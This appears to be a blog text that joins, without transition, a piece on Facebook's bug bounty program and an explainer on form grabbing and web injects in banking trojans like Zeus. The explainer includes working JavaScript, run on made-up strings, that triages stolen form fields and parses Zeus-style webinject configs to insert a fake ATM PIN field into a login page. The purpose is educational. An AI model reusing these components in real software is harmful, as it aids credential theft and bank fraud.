In today’s world there are dozens of big-name companies being hacked every year through countless vulnerabilities in software that we all depend on. This has created a rather bleak public opinion of the term ‘hacker.’ Yet, as Facebook is clearly aware, not all hacking is bad hacking; it depends on what you do with the holes you find.
Facebook is a company that should be very concerned about cyber security: over a billion (yes, I said a billion) people around the world use this social media behemoth, which means Facebook has a lot of private information to keep track of. Recognizing this, Facebook started an ongoing public program back in 2011 to give hackers a chance to turn away from the dark side, albeit with a little monetary reward as incentive. The program gives hackers a chance to quietly report any vulnerabilities they have found directly to Facebook in exchange for a cash bounty, instead of using or selling them.
Colloquially these hackers are known as ‘white hat’ hackers, and there are surprisingly a lot of them. Facebook dished out a total of 1.3 million dollars in 2014 alone through this program, with bounties ranging from as low as $500 to as high as $30,000. Just recently, a hacker named Laxman Muthiyah discovered a way to delete any user’s photo albums through Facebook’s Graph API. Grateful for the find, Facebook gave him a whopping $12,500 for reporting it privately rather than making it public.
Despite this monetary reward, these hackers can’t all be in it for the money. By exploiting Facebook’s holes on their own or by selling them to criminals, they could surely turn a much higher profit than what Facebook is offering. Yet the reward, coupled with a sense of morality, is what drives these hackers to continue to do good rather than evil.
In the growing world of cyber crime, new methods are constantly created and used for espionage, financial theft (fraud), and even cyber warfare. The term form grabbing refers to a method of capturing web form data from inside the browser. It is easy to confuse form grabbing with traditional keylogging, but a keylogger records every individual keystroke by hooking the keyboard APIs or even acting as a keyboard device driver. Keylogging is steadily being displaced by form grabbing in financially motivated malware, because a criminal interested in your credit card and bank account does not want to read countless logs of Facebook conversations. A form grabber instead hooks the browser’s own form-submission and HTTP-sending functions and logs each submission as a tidy set of field names and values. Because the hook sits inside the browser, before the data is handed to the TLS layer, it captures the plaintext even on HTTPS sites: HTTPS protects the data on the wire, not on an infected endpoint.
The method was invented in 2003 by the developer of the Berbew Trojan (http://www.symantec.com/security_response/writeup.jsp?docid=2003-071612-0251-99), but it was made popular by the infamous banking trojan Zeus in 2007. The first advancement in Zeus’s form grabbing module was that, even in early versions, it inspected the grabbed data and the website it was submitted to and decided whether the information was useful to the criminal, so that only relevant submissions were logged. This made the form grabber far more effective at stealing sensitive information. Another banking trojan, SpyEye (a rival of Zeus), developed web injects, which “injected” extra forms or fields into legitimate websites to trick the user into entering information such as PIN numbers and even social security numbers. Web injects were later adopted by Zeus as well, and new underground markets emerged for effective web injects targeting popular websites such as eBay and PayPal.
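The two mechanisms described above, modelled as an added example that is not part of the original article and not the code of Zeus, SpyEye or any other trojan. It runs on constructed strings rather than in a browser: the target list, the webinject config, the login page and the submitted form bodies are all made up for the example. The form-grabbing half shows only the triage step that happens after the browser’s HTTP-sending function has been hooked (the plaintext POST body is already in hand); the hooking itself is not shown. The webinject half uses the documented Zeus config keywords (set_url, data_before, data_inject, data_after, data_end) and treats `*` as a wildcard; how it handles data_after is a simplification and is marked as such in the code.

```javascript
// Added example (not from the original article, not any real trojan's code):
// models the two techniques described above on constructed strings, without a
// browser. Part 1 is what a form grabber sees once the browser's HTTP-sending
// function is hooked: the plaintext POST body, triaged against a target list
// the way early Zeus did. Part 2 parses a Zeus-style webinject config and
// splices the injected HTML into a page. The hooking itself is not shown.

// ---- Part 1: form grabbing, triage of a captured submission ----
// Constructed target list: glob-style URL patterns and the field names the
// operator wants. "atmpin" is the field the web inject in Part 2 adds to the page.
const TARGETS = [
  { pattern: 'https://*.examplebank.test/login*', fields: ['userid', 'password', 'atmpin'] },
  { pattern: 'https://checkout.example.test/pay*', fields: ['cardnumber', 'cvv', 'expiry'] },
];

// Turn a '*' glob into a regex source; every other character is taken literally.
function globToSource(glob) {
  return glob.replace(/[.+?^${}()|[\]\\]/g, '\\$&').replace(/\*/g, '.*?');
}
const globToRegExp = glob => new RegExp('^' + globToSource(glob) + '$', 'i');

// Decode an application/x-www-form-urlencoded body into { name: value }.
function parseFormBody(body) {
  const dec = s => decodeURIComponent(s.replace(/\+/g, ' '));
  const out = {};
  for (const pair of body.split('&')) {
    if (!pair) continue;
    const i = pair.indexOf('=');
    out[dec(i < 0 ? pair : pair.slice(0, i))] = dec(i < 0 ? '' : pair.slice(i + 1));
  }
  return out;
}

// Luhn checksum: a cheap way to confirm a captured "card number" really is one.
function luhnValid(digits) {
  if (!/^\d{13,19}$/.test(digits)) return false;
  let sum = 0;
  for (let i = digits.length - 1, dbl = false; i >= 0; i--, dbl = !dbl) {
    let d = Number(digits[i]);
    if (dbl && (d *= 2) > 9) d -= 9;
    sum += d;
  }
  return sum % 10 === 0;
}

// The "is this useful?" decision: null for sites the operator does not care
// about, otherwise only the wanted fields (card numbers that fail Luhn are dropped).
function grabForm(url, body) {
  const target = TARGETS.find(t => globToRegExp(t.pattern).test(url));
  if (!target) return null;
  const fields = parseFormBody(body), grabbed = { url, fields: {} };
  for (const name of target.fields) {
    if (!(name in fields)) continue;
    if (name === 'cardnumber' && !luhnValid(fields[name].replace(/[\s-]/g, ''))) continue;
    grabbed.fields[name] = fields[name];
  }
  return grabbed;
}

// ---- Part 2: web injects, parse a config and rewrite a page ----
// Constructed config in the Zeus webinject syntax; '*' in data_before is a wildcard.
const WEBINJECT_CONFIG = `
set_url https://*.examplebank.test/login* GP
data_before
<input type="password" name="password"*>
data_end
data_inject
<br>ATM PIN: <input type="password" name="atmpin">
data_end
data_after
data_end
`;

// One entry per set_url; each data_* block runs until its data_end line.
function parseWebinjects(text) {
  const injects = [];
  let cur = null, sec = null;
  for (const line of text.split('\n').map(l => l.trim())) {
    if (line.startsWith('set_url ')) {
      const [, url, flags = ''] = line.split(/\s+/);
      injects.push(cur = { url, flags, data_before: '', data_inject: '', data_after: '' });
    } else if (/^data_(before|inject|after)$/.test(line)) sec = line;
    else if (line === 'data_end') sec = null;
    else if (sec && cur) cur[sec] += (cur[sec] ? '\n' : '') + line;
  }
  return injects;
}

// Insert data_inject right after the first data_before match. Simplification:
// a non-empty data_after must match at the insertion point, otherwise skip.
function applyWebinjects(url, html, injects) {
  let out = html;
  for (const inj of injects) {
    if (!inj.data_before || !globToRegExp(inj.url).test(url)) continue;
    const m = new RegExp(globToSource(inj.data_before), 'i').exec(out);
    if (!m) continue;
    const at = m.index + m[0].length;
    if (inj.data_after && !new RegExp('^' + globToSource(inj.data_after), 'i').test(out.slice(at))) continue;
    out = out.slice(0, at) + inj.data_inject + out.slice(at);
  }
  return out;
}

// Constructed login page; after injection the grabber also sees the PIN field.
const LOGIN_HTML = `<form action="/login.do" method="post">
User: <input type="text" name="userid"><br>
Password: <input type="password" name="password" autocomplete="off">
<input type="submit" value="Sign in"></form>`;

const injects = parseWebinjects(WEBINJECT_CONFIG);
console.log(applyWebinjects('https://www.examplebank.test/login.do', LOGIN_HTML, injects));
console.log(grabForm('https://www.examplebank.test/login.do', 'userid=alice&password=s3cret%21&atmpin=1234'));
```

Run it with `node` to see the rewritten login form and the triaged submission. The point worth noticing is that nothing in Part 1 touches the network: the body is already plaintext when the hooked browser function receives it, which is why HTTPS does not help a victim whose browser process is compromised, and why the same parser that decodes a normal form also decodes the field a web inject added.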